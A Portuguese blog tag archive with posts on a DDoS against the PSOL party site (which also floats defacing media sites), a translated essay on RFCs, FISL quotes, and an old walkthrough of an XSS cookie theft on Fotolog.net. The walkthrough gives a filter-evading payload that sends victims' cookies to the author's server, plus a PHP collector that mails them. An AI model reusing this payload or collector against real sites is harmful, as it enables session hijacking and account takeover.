Arquivo da tag: hacker

Sobre os anônimos que tiraram o site do PSOL do ar

Fui surpreendido hoje à noite pela notícia de que internautas tiraram do ar o site nacional do PSOL por 10 horas. O motivo: #OpImagemLimpa, de algumas pessoas que bizarramente acham que detêm o título de “os únicos anônimos dignos de usarem a máscara do Guy Fawkes”:

Aprendão a não usar a imagem do #Anonymous, não censurem seus usuários – #OpImagemLimpa – Ataques, Defaces e Divulgação de dados de todas as pessoas e grupos que estão usando nossa imagem de má fé! –

Quero fazer algumas poucas considerações breves e, fraternalmente, dar algumas sugestões aos companheiros que participaram dessa operação, na minha opinião, bastante infame.

  1. Anônimos com A maiúsculo surgiram num momento em que o mundo se mobiliza por democracia real: nas praças do mundo árabe onde derrubaram ditaduras, nas ruas da Europa em busca de alternativas para que os trabalhadores não paguem pela crise econômica, na defesa da democratização dos meios de comunicação e da internet ao lado do Wikileaks e de Julian Assange, defendendo que ninguém tire sites arbitrariamente na internet e com uma multidão tirando do ar sites de Visa, Mastercard e Paypal para repudiar essas empresas que apoiaram a tentativa do governo americano de acabar com o Wikileaks.
  2. Anônimos não são um coletivo organizado. Anônimos somos todos nós, que queremos usar a internet sem expôr a nossa identidade, todos nós em movimento e com toda nossa diversidade, todos que juntos nos mobilizamos e vamos pras ruas independente de raça, origem ou religião, e que usamos uma máscara que representa a liberdade — uma máscara que jamais deve ser pretexto para a censura e para o desrespeito. Ninguém é dono do título de anônimo, decide quem é anônimo e quem não é, quem usa a máscara e quem não usa.
  3. O site nacional do PSOL é um site que divulga as lutas populares, dos trabalhadores em greve, das mulheres, do movimento LGBT, as mobilizações em curso do Chile a Grécia, denuncia a tentativa de golpe no Paraguai se contrapondo à mídia tradicional e apresentando alternativas que querem romper com a politicagem naturalizada, como Freixo no Rio. Seja você do PSOL ou não, anônimo ou não, por que derrubar esse site? É esse seu maior inimigo? A que serve derrubar o site do PSOL? Quem sai ganhando quando nos dividimos são os capitalistas, o 1%, que ao fragmentarem os 99% fazem com que nós percamos a noção de que fazemos parte de uma só classe neste sistema e que devemos lutar juntos para superá-lo.
  4. É fácil derrubar um site como o do PSOL. É o site de um partido independente a grandes banqueiros e empresários, que não gasta dinheiro num super datacenter. Realizar um DDoS lá não tem nada de desafiador, de hacker ou de incrível; é só pura falta do que fazer mesmo.

Que tal usarmos a nossa energia para algo útil? Em vez de só ficarmos defendendo uma máscara como se ela tivesse dono (no melhor estilo da indústria do copyright) e congestionando sites arbitrariamente, que tal defendermos a internet livre e democrática, onde todos podemos participar e expôr nossas ideias, como defendeu todo o movimento em torno do Wikileaks que deu origem a Anônimos como substantivo próprio? Contra a retirada do sites do ar, e não a favor.

Que tal criar sites de mídia alternativa (como o Juntos, o Jornalismo B, o blog do Tsavkko e tantos outros), usar a internet para fazer as notícias que o governo e a mídia não querem que cheguem nas pessoas chegarem? Ou ainda que tal defacear os sites da mídia tradicional pra expôr a greve dos professores federais que não é noticiada, as contradições dos governos e da velha política que une PT a Maluf em São Paulo?

São desafios bem maiores que tirar um site como o do PSOL nacional do ar, que precisam de muitos anônimos e não-anônimos unidos para serem colocados em prática e que contribuem muito mais para criarmos um novo sistema econômico e social, com democracia real, igualdade e liberdade para todos. Além de fazerem muito mais justiça ao legado da máscara de Guy Fawkes.

Editado em 24/06 às 13:13 pra adicionar o texto abaixo:

Mas resta uma dúvida: afinal, qual foi o “crime” que motivou esse protesto? Teria o site do PSOL nacional cometido a terrível transgressão de veicular alguma foto com uma máscara preto e branca como essa? Teria alguém comentado em algum lugar da internet com o nome Anônimo reivindicando ou pedindo votos para o PSOL (barbaridade que, cá entre nós, merece a sentença de cortar uma mão fora além de tirar o site do PSOL do ar pra todo o sempre)? É pior que isso, acreditem. Um companheiro de Brasília me escreveu um e-mail pra contar:

O Twitter @PSOLMESDF recomendou um perfil desses anônimos iluminados que acham que são os únicos anônimos da internet num #FollowFriday. A resposta desse Anônimo foi: @PSOLMESDF ta loco??? pq ta me indicando, sou apartidario! vão se foder! e logo em seguida: Galera preciso de uma ajuda, denunciem este perfil @PSOLMESDF , o fdp ta tentando sujar a ideia ‪#anonymous‬. Não é fantástico? Retuitar ou dar follow friday para um desses caras é denegrir a sua imagem e merece protestos. É suficiente para o site de um partido sair do ar por 10 horas.

Bom… Prefiro pensar que as pessoas que participaram dessa operação não sabiam o motivo. O mínimo que alguém decente esperaria seria um pedido de desculpas, mas, caros anônimos (na verdade, uma pequeníssima parte dos anônimos que teve a ver com isso), tudo bem se o orgulho de vocês não permitir isso: Só peço que vocês pensem melhor no que estão fazendo da próxima vez e estejam do lado de quem quer construir uma internet com liberdade e democracia, não uma de censura e arbitrariedades.

(e um abraço a todos que me mandaram mensagens me xingando por eu ter cometido o terrível erro de escrever a verdade: o que vocês fizeram foi um absurdo)

43 anos de Internet

Há exatos 43 anos foi escrito o primeiro RFC (Request for Comments), motivo pelo qual muitos comemoramos no dia 7 de abril o nascimento da Internet. Imagino que poucas pessoas já leram ou sabem o que são RFCs fora do meio nerd: em resumo, são simples documentos de texto com não mais de 80 caracteres de largura que regulamentam os protocolos usados na Internet e são fundamentais para o desenvolvimento dos programas que você usa diariamente, inclusive o que você está usando para abrir o meu blog (seja no seu computador, no seu celular, ou no seu óculos).

Traduzi para o português (meio correndo e talvez porcamente; me corrijam se acharem alguma coisa muito errada) e recomendo a leitura do texto abaixo, escrito pelo cara que fez o primeiro RFC e publicado pelo The New York Times há três anos (para o aniversário de 40 anos da Internet). Além do valor histórico, acho que é um texto que tem muito a ver com o debate sobre as possibilidades que a internet do Wikileaks e do Mega Upload nos abre hoje e sobre os valores democráticos da rede, que têm sido duramente combatidos pelo conservadorismo do governo dos Estados Unidos e por iniciativas como a SOPA nos EUA e a Lei Azeredo no Brasil.

Como a Internet obteve suas regras

* Stephen Crocker

Hoje é uma data importante na história da Internet: é o aniversário de 40 anos dos chamados RFCs (Request for Comments). Fora da comunidade técnica, poucos sabem o que são RFCs, mas esses simples documentos moldaram o funcionamento interno da Internet e têm desempenhado um papel significativo no seu sucesso.

Quando os RFCs nasceram, não havia a World Wide Web. Mesmo no final de 1969, havia apenas uma rede rudimentar ligando quatro computadores em quatro centros de pesquisa: a UC Los Angeles, o Stanford Research Institute, a UC Santa Barbara e a Universy of Utah em Salt Lake City. O governo financiou a rede e os cem ou menos cientistas da computação que a utilizaram. Era uma comunidade tão pequena que todo mundo se conhecia.

Muito planejamento e muitas deliberações tinham sido feitos sobre a base da tecnologia da rede, mas ninguém tinha pensado muito no que fazer com ela. Então, em agosto de 1968, um punhado de estudantes e funcionários dos quatro locais começaram a se reunir intermitentemente pessoalmente para tentarem descobrir. (Fui sortudo o suficiente para ser um dos estudantes da UCLA incluídos nessas grandes discussões.) Só na primavera seguinte nós percebemos que deveríamos começar a escrever nossos pensamentos. Pensamos que talvez devêssemos juntar memorandos temporários e informais sobre os protocolos da rede, as regras pelas quais os computadores trocam informação. Me ofereci para organizar nossas primeiras notas.

O que deveria ser uma tarefa simples acabou se tornando um projeto desesperador. Nossa intenção era apenas encorajar outras pessoas a dialogarem, mas fiquei preocupado que soasse como se estivéssemos tomando decisões oficiais ou afirmando autoridade. Na minha cabeça, eu estava incitando a ira de algum professor de prestígio em algum estabelecimento da Costa Leste. Eu estava realmente perdendo o sono com a coisa toda e quando finalmente decidi escrever meu primeiro memorando, que lidava com a comunicação básica entre dois computadores, era madrugada. Tive que trabalhar no banheiro para não incomodar os amigos com quem eu estava hospedado, que estavam todos dormindo.

Ainda com medo de soar presunçoso, rotulei a nota “Request for Comments” (Pedido de Comentários). O RFC 1, escrito 40 anos atrás, deixou muitas perguntas sem resposta e logo se tornou obsoleto. Porém, os RFCs se enraizaram e floresceram. Eles se tornaram o método formal de publicar padrões do protocolo da Internet, e hoje são mais de 5000, todos disponíveis online.

Começamos a escrever essas notas antes que nós tivéssemos e-mail e mesmo antes que a rede estivesse realmente funcionando, então nós escrevíamos nossas visões para o futuro no papel e mandávamos pelo correio. Enviávamos uma impressão para cada grupo de pesquisa e eles tinham que tirar suas cópias.

Os primeiros RFCs variavam de grandes visões para detalhes mundanos, embora o segundo rapidamente tenha se tornado o mais comum. Menos importante do que o conteúdo desses primeiros documentos era o fato de que eles eram disponíveis de forma gratuita e qualquer um poderia escrever um. Em vez de um modelo de tomada de decisão baseado em autoridade, nós confiamos num processo que chamamos de “consenso básico e código em execução”. Todo mundo era bem-vindo a propôr ideias e, se pessoas suficientes gostassem e usassem, o projeto se tornava um padrão.

No fim, todos entendiam que havia uma utilidade prática em escolher fazer a mesma tarefa da mesma forma. Por exemplo, se quiséssemos mover um arquivo de uma máquina para a outra, se você projetasse o processo de uma forma e eu projetasse de outra, então qualquer pessoa que quisesse falar com nós dois teria que usar duas formas diferentes para fazer a mesma coisa. Então houve muita pressão natural para evitar tais inconvenientes. Provavelmente ajudou que naqueles dias nós evitávamos patentes e outras restrições; sem incentivo financeiro para controlar os protocolos, era muito mais fácil chegar a acordos.

Isso foi o melhor para a abertura dos projetos técnicos, e a cultura dos processos abertos foi essencial para permitir que a internet crescesse e evoluísse da forma tão espetacular como fez. Na verdade, nós provavelmente não teríamos a web sem eles. Quando os físicos do CERN quiseram publicar um monte de informações numa forma que as pessoas pudessem facilmente pegá-las e adicionarem às mesmas, eles simplesmente construíram e testaram suas ideias. Por causa do fundamento que colocamos no RFC, eles não tiveram que pedir permissão, ou fazerem quaisquer mudanças nas operações básicas da Internet. Outros logo copiaram-os — centenas de milhares de usuários de computador, então centenas de milhões, criando e compartilhando conteúdo e tecnologia. Isso é a Web.

Posto de outra forma, nós sempre tentamos projetar cada novo protocolo para ser útil tanto para seu próprio fim como para serem um bloco de construção disponível para outros. Nós não pensamos nos protocolos como produtos acabados, mas deliberadamente expusemos suas arquiteturas internas para fazer fácil que os outros os aproveitassem. Isso era a antítese da atitude das velhas redes de telefonia, que desencorajavam fortemente quaisquer acréscimos ou utilizações que elas não haviam sancionado.

É claro que o processo para publicar ideias e escolher padrões eventualmente se tornou mais formal. Nossas reuniões soltas e anônimas cresceram e se semi-organizaram no que chamamos de Network Working Group (Grupo de Trabalho da Rede). Nas quatro décadas desde lá, esse grupo evoluiu, se transformou algumas vezes e hoje é a Internet Engineering Task Force (Força de Tarefa da Engenharia da Internet). Ela tem alguma hierarquia e formalidade, mas não muita, e continua a ser gratuita e acessível a qualquer um.

Os RFCs cresceram também. Eles não são mais realmente pedidos de comentários, porque eles são publicados somente depois de muita examinação. Mas a cultura que foi construída no início continuou a desempenhar um papel importante em manter as coisas mais abertas do que elas poderiam ter sido. Ideias são aceitas e classificadas pelos seus méritos, com tantas ideias rejeitadas como aceitas.

A medida que reconstruirmos nossa economia, espero que tenhamos em mente o valor da transparência, especialmente em indústrias que raramente a tiveram. Seja na reforma do sistema de saúde ou na inovação da energia, as maiores recompensas virão não do que o pacote de incentivo paga diretamente, mas das perspectivas que abrimos para os outros explorarem.

Me lembrei do poder e da vitalidade dos RFCs quando eu fiz a minha primeira viagem para Bangalore, India, há 15 anos atrás. Fui convidado a dar uma palestra no Indian Institute of Science e durante a visita fui apresentado a um estudante que construiu um sistema de software bastante complexo. Impressionado, perguntei onde ele havia aprendido a fazer tudo aquilo. Ele respondeu simplesmente: “Eu baixei os RFCs e li.”

* Stephen D. Crocker escreveu o primeiro RFC há exatos 43 anos.

Destaques do 1º dia do 12º Fórum Internacional do Software Livre

ATENÇÃO: Este conteúdo foi publicado há 6 anos. Eu talvez nem concorde mais com ele. Se é um post sobre tecnologia, talvez não faça mais sentido. Mantenho neste blog o que escrevo desde os 14 anos por motivos históricos. Leia levando isso em conta.

Seguem alguns registros aleatórios do que vi no primeiro dia (29/06) deste FISL em Porto Alegre.

Software livre

“Debater software livre não é discutir trocar Windows pra Linux. Isso é o de menos. Debater, e mais importante, militar pelo software livre, é criar redes para transformar o mundo.”

(Wilkens Lenon)

“A liberdade de software não é útil só pra quem escreve o programa, mas para todos, da mesma forma que a liberdade de imprensa não é útil só pra quem escreve, mas pra todos, porque você pode escolher o que escutar (ou o que usar).”

(Alexandre Oliva)

Cloud computing

“Onde há nuvem há tempestade. Computação em nuvem é pior do que computação privativa porque você não tem nenhuma das quatro liberdades. Mais que isso: além de não ter acesso ao programa, você não tem acesso aos seus dados.”

(Alexandre Oliva)

“Software livre rodando na nuvem é tão maléfico quanto software proprietário rodando na nuvem.”

(Rodrigo R. Silva)

Sobre Flash

“O Gnash é uma máquina virtual. O Gnash não é solução, nem que funcione. A solução é não precisar rodar uma aplicação alienígena no seu computador para assistir um vídeo.”

(Felipe Sanches)

Formatos fechados

“Delimitam, controlam, bloqueiam, aprisionam e criam dependência. Documentos não são como blocos de papel: daqui a 10 anos eu consigo ler o que está escrito num papel, mas dependo de uma empresa pra conseguir ler um formato fechado.”

(Sérgio Amadeu)

Além das citações

  1. Numa mesa sobre educação e inclusão digital, Sady Jacques mencionou que seria interessante ter fundamentos de ciência da computação nas escolas. É algo que eu acho muito importante e, entre o pessoal de OBI/Maratona, discutimos com frequência. Surgiu a ideia de lançar um abaixo-assinado.
  2. No Encontro de Hackers GNU+Linux-libre, foi discutida a importância de termos firmwares livres. Recomendou-se enviar e-mails para as empresas cobrando o código dos firmwares.
  3. Na audiência pública com Tarso Genro, Alexandre Oliva citou por minutos problemas que governos e pessoas tiveram confiando em software proprietário. São bons exemplos para habituais discussões. Não lembro de todos, mas aqui vão alguns: a guerra entre Argentina e Inglaterra em que os mísseis (comprados da França) não funcionavam contra navios ingleses; a Microsoft ter usado criptografia com apenas 40 bits nos computadores dos usuários durante anos, permitindo que o governo americano descriptografasse o que os usuários de Windows faziam; recentemente espionando conversas no Skype; o Gmail ter um backdoor para o governo dos EUA (que China usou para invadir recentemente); a Sony processando pessoas que descobriram como usar um computador para instalar o que quisessem nele (o Playstation 3); a Nintendo destruindo videogames a distância; a Amazon deletando e-books do Kindle a distância (ironicamente, o livro 1984); o iPhone e o Android anotando todos os lugares por onde o usuário passa junto com informações sobre redes sem fio e mandando para a Apple / o Google; o celular distribuído para crianças com câmera acionada pela sua escola.
  4. Na mesma audiência, Sérgio Amadeu falou da importância que tem os governos abrirem seus bancos de dados e todas as informações que têm em formato aberto e em redes P2P, sugerindo uma democracia radical em que todos os usuários da internet possam baixar rápido e processar as informações (data mining), de forma que grupos organizados (e desorganizados) possam controlar gastos e decisões públicas. Ideia interessante. Outras ideias interessantes da mesma fala, para pensar mais a respeito: analogia entre rede elétrica e a internet (alguém controla se você liga um liquidificador ou um chuveiro?); recursos educacionais abertos (professores remixam o material que usam); biotecnologia de garagem (nunca escrevi ou pesquisei muito sobre o tema, que é uma aplicação legal da cultura hacker fora do computador).

Falha no Fotolog.net

ATENÇÃO: Este conteúdo foi publicado há 12 anos. Eu talvez nem concorde mais com ele. Se é um post sobre tecnologia, talvez não faça mais sentido. Mantenho neste blog o que escrevo desde os 14 anos por motivos históricos. Leia levando isso em conta.

Segue a descrição de como descobri que consigo pegar o cookie do Fotolog.net de qualquer pessoa que entra no meu profile, e com isso, poder:

  • Adicionar comentários em qualquer fotolog como a pessoa
  • Remover comentários do fotolog da pessoa
  • Adicionar/remover FF list
  • Ver e-mail de cadastro da pessoa

[update] Parece que isso não funciona mais hoje. De qualquer maneira, é um bom guia (acho que tá bem detalhado) para roubar cookies de vários outros sitemas que tenham falhas como esta (e não são poucos). [/update]

Nos últimos dias, alguém pegou a senha do Fotolog.net de um amigo meu e ele me pediu para que eu tentasse recuperar. Não consegui descobrir senha. Porém, usando furos do Fotolog.net e do Internet Explorer, descobri que consigo estar loggado com qualquer usuário que entre no meu perfil! Já que é preciso escrever a senha em cada página do Fotolog.net (upload, mudar profile, etc.) a única coisa que posso fazer loggado como a pessoa é escrever comentários, mas mesmo assim já é uma coisa estranha que merece a atenção do administrador do Fotolog.net (para o qual irei enviar um e-mail). Irei postar um “passo-a-passo” de como pegar o cookie de login do Fotolog.net e com isto, loggar como a pessoa que perdeu esse cookie.

O cookie do Fotolog.net dura mais de um ano… Isso é um problema grave de segurança, mas não é utilizando esta falha que faço tudo. O que eu fiz foi um JavaScript dentro de um CSS redirecionar para uma página PHP com função mail que me envia a função document.cookie do JavaScript que roda no cliente na página do Fotolog.net! É um pouco difícil de explicar, mas não tão complicado. Meu objetivo postando aqui não é incentivar que as pessoas façam isso (eu só fiz comigo mesmo testando), mas incentivar os que possuem conta no Fotolog.net usarem browsers decentes (como Firefox ou Opera) ou não clicar em profiles de estranhos. Tenho certeza de que hackers de verdade não usarão isto para o mal, mas sim para fins de aprendizagem, como eu fiz; mas parece que vários newbies por aí se acham e se acharão o máximo postando comentários como outras pessoas com a minha “receita de bolo”! Por esses, preciso lamentar e mandar ler a definição de hacker no Jargon File.

A primeira barreira que tive que ultrapassar foi que só 500 brasileiros por dia podem se registrar no Fotolog.net! Bom… Eu tava ansioso pra tentar fazer isso e já que eu não tinha tempo a perder, entrei no site Public Proxy Servers e usando um proxy high-anonimity do Vietnã me registrei no Fotolog.net… Perfeito! Apareceu que nenhum visitante do Vietnã tinha se cadastrado no dia.

Então, fui até o meu profile e no endereço do meu site eu tentei colocar aspas. Percebi que funcionou, então testei um código de bastante fácil entendimento:

#" style="background:url(javascript:location.href='http://tableless.tiagomadeira.net/foo.php'+escape(document.cookie))

Mas não funcionou porque o Fotolog.net não permite “javascript” na frase. Então após alguns testes cheguei ao:

#" style="background:url(ja       vas       cript:location.href=%27 http://www.tiagomadeira.net/r.php?c=%27       +escape(document.cookie))

OBS.: Tenho recebido e-mail de pessoas dizendo que o não cabe… O meu também não cabia, mas é só questão de diminuir o endereço.

Este código só funciona porque o Internet Explorer é problemático! Não tem nada a ver um JavaScript dentro de uma url de fundo e ainda ir para este endereço! E o Fotolog.net também tem um bug seríssimo porque não deveria poder se usar aspas no endereço de um site! Daí no meu profile aparece no lugar do endereço da minha página:

<a href="#" style="background:url(ja       vas       cript:location.href=%27 http://www.tiagomadeira.net/r.php?c=%27       +escape(document.cookie))">#" style="background:url(ja       vas       cript:location.href=%27 http://www.tiagomadeira.net/r.php?c=%27       +escape(document.cookie))</a>

Bom, depois disso basta fazer uma página PHP que passe este valor do c para um banco de dados ou e-mail (no meu caso, preferi por e-mail mesmo). Criei uma página no meu /r.php com:

< ?php
$cookie=$_GET["c"];
mail("meu@email", "Presente pra você!", "$cookie");
Header("Location: http://tableless.tiagomadeira.net");
?>

E o último problema que enfrentei então foi colocar este cookie no meu Firefox. Depois de vários testes, descobri que eu podia editar os cookies do meu Firefox. Para isto abri meu >~/.mozilla/firefox/profiles/??????.default/cookies.txt e modifiquei o cookie para o que eu recebi no e-mail. E finalmente loggado!

Vou tentar simplificar o “algoritmo”:

  • A pessoa está loggada (sempre, pois o cookie do fotolog.net é gigantesco) e entra no meu perfil.
  • Meu perfil pega o cookie do Fotolog.net deste computador (que precisa estar usando Internet Explorer) e me envia via a função mail do PHP.
  • Eu troco o cookie do meu Firefox pelo que eu recebi no e-mail e com isto fico loggado como a pessoa!

Interessante, né?

Bom, como já havia dito, isto foi apenas para fins de aprendizagem e descobri tudo isto justamente porque algum lammer pegou a senha de um amigo meu, mas espero que as pessoas aprendam a lição para não se tornarem as vítimas deste “golpe”.

Eu conheço três formas para se tornar resistente a esse golpe:

Bom… É isso aí.

Aprendi muito com isto e por isso compartilho este conhecimento neste post para que outros também possam aprender. Quem puder, divulgue para seus amigos para que eles não sejam vítimas desse tipo de coisa.